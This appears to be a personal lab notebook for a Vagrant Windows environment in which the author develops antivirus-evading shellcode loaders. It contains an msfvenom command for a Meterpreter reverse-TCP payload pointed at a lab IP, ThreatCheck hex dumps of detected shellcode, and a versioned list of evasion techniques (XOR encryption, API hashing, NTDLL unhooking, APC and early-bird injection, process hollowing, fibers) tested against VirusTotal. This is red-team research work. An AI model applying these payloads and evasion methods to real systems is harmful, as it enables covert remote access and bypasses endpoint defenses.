Process-Injection-and-Reflective-Code-Loading

Setup

Install vagrant:

source .venv/bin/activeate
vagrant up --no-provision

ansible-playbook -i inventory.ini ansible/main.yml -c winrm

Saferwall

Github link

vagrantbox is locked :/ --> SSH is set to keybased, but without the key provieded 🤡

vagrant up

building the vagrant itself in build/vagrant also doesnt work :/

Creating shellcode

No sliver --> becuase they are very biggg > 10 MB

PS C:\Users\vagrant> wmic OS get OSArchitecture
OSArchitecture
64-bit

PS C:\Users\vagrant> Get-Process | Where-Object { $_.Name -eq "explorer" } | Select-Object Name, Id, @{Name="Architecture";Expression={if ($_.Path -match "SysWOW64") {"x86"} else {"x64"}}}

Name       Id Architecture
----       -- ------------
explorer 1200 x64

msfvenom --payload windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=9001 --format c

https://github.com/rasta-mouse/ThreatCheck.git

Get dotNet developer pack

https://dotnet.microsoft.com/en-us/download/dotnet-framework/thank-you/net48-developer-pack-offline-installer

scanes

virustotal https://kleenscan.com/index

0.0.3 (xor + CreateProcessA + WriteProcessMemory + SetThreadContext + ResumeThread)

Working :D Virustotal:

0.0.4 (Improved xor + CreateProcessA + WriteProcessMemory + SetThreadContext + ResumeThread)

Virustotal:

0.0.6 (Improved encryptor)

Virustotal:

0.1.0 (API Hashing)

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware Virustotal:

0.2.0 (Unhook NTDLL)

Virustotal:

0.2.1 (apply API Hashing to all)

Virustotal:

0.3.0 (APC Injection)

Virustotal:

https://unprotect.it/technique/apc-injection/

0.4.0 (Early bird APC injection)

Virustotal:

0.5.0 (Process Hollowing)

Virustotal:

Source:

Iredteam

Reflective Code Loading

0.0.1 (Simple VirtualAlloc + memcpy + CreateThread)

Defender Flaged(Static)

C:\Users\vagrant\Downloads\ThreatCheck\ThreatCheck\bin\Release>ThreatCheck.exe -f C:\Users\vagrant\source\repos\ConsoleApplication1\x64\Debug\ConsoleApplication1.exe
[+] Target file size: 62464 bytes
[+] Analyzing...
[!] Identified end of bad bytes at offset 0xAF9D
0000AE9D   40 24 49 01 D0 66 41 8B  0C 48 44 8B 40 1C 49 01   @$I.DfA..HD.@.I.
0000AEAD   D0 41 8B 04 88 48 01 D0  41 58 41 58 5E 59 5A 41   DA...H.DAXAX^YZA
0000AEBD   58 41 59 41 5A 48 83 EC  20 41 52 FF E0 58 41 59   XAYAZH.ì ARÿàXAY
0000AECD   5A 48 8B 12 E9 4B FF FF  FF 5D 49 BE 77 73 32 5F   ZH..éKÿÿÿ]I_ws2_
0000AEDD   33 32 00 00 41 56 49 89  E6 48 81 EC A0 01 00 00   32..AVI.æH.ì ...
0000AEED   49 89 E5 49 BC 02 00 23  29 C0 A8 38 65 41 54 49   I.åI¼..#)A"8eATI
0000AEFD   89 E4 4C 89 F1 41 BA 4C  77 26 07 FF D5 4C 89 EA   .äL.ñAºLw&.ÿOL.ê
0000AF0D   68 01 01 00 00 59 41 BA  29 80 6B 00 FF D5 6A 0A   h....YAº).k.ÿOj.
0000AF1D   41 5E 50 50 4D 31 C9 4D  31 C0 48 FF C0 48 89 C2   A^PPM1ÉM1AHÿAH.A
0000AF2D   48 FF C0 48 89 C1 41 BA  EA 0F DF E0 FF D5 48 89   HÿAH.AAºê.ßàÿOH.
0000AF3D   C7 6A 10 41 58 4C 89 E2  48 89 F9 41 BA 99 A5 74   Çj.AXL.âH.ùAº.¥t
0000AF4D   61 FF D5 85 C0 74 0A 49  FF CE 75 E5 E8 93 00 00   aÿO.At.IÿIuåè...
0000AF5D   00 48 83 EC 10 48 89 E2  4D 31 C9 6A 04 41 58 48   .H.ì.H.âM1Éj.AXH
0000AF6D   89 F9 41 BA 02 D9 C8 5F  FF D5 83 F8 00 7E 55 48   .ùAº.UE_ÿO.o.~UH
0000AF7D   83 C4 20 5E 89 F6 6A 40  41 59 68 00 10 00 00 41   .Ä ^.öj@AYh....A
0000AF8D   58 48 89 F2 48 31 C9 41  BA 58 A4 53 E5 FF D5 48   XH.òH1ÉAºX☼SåÿOH

--> shellcode gets flaged Virustotal:

0.0.2 (Simple VirtualAlloc + memcpy + CreateThread + xor encryption)

Defender Flaged (Runtime)

C:\Users\vagrant\Downloads\ThreatCheck\ThreatCheck\bin\Release>ThreatCheck.exe -f C:\Users\vagrant\source\repos\ConsoleApplication1\x64\Debug\ConsoleApplication1.exe
[+] No threat found!

Virustotal:

0.0.5 (ConvertThreadToFiber + VirtualAlloc + VirtualProtect + SwitchToFiber)

Virustotal:

Sources

• https://whokilleddb.github.io/blogs/posts/a_study_in_obfuscation/ (fibers?)
• https://github.com/whokilleddb/A-Study-in-Obfuscation/blob/main/implant.cpp
• https://www.hopinfosec.com/evasion/2022/05/11/evasion-pt3/